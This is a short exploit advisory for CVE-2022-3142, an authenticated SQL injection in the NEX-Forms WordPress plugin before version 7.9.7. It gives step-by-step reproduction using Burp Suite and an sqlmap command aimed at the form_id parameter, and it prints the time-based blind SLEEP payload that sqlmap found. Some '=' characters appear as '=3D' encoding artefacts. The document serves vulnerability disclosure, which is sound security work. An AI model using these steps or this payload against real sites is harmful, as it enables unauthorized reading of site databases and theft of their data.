# Exploit Title: NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi  
# Exploit Author: Elias Hohl  
# Date: 2022-08-01  
# Vendor Homepage:  
# Software Link:  
# Tested on: Ubuntu 20.04  
# CVE : CVE-2022-3142  
Authenticated SQL injection vulnerability in the "NEX Forms" Wordpress plugin  
1. Start a new Wordpress instance using docker-compose.  
2. Install the NEX Forms plugin.  
3. Open the URL "/wp-admin/admin.php?page=3Dnex-forms-dashboard&form_id=3D1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite.  
4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=3DT --dbms=3Dmysql --level 5 --risk 3  
sqlmap will find a time-based blind payload:  
Parameter: form_id (GET)  
Type: time-based blind  
Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)  
Payload: page=3Dnex-forms-dashboard&form_id=3D1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)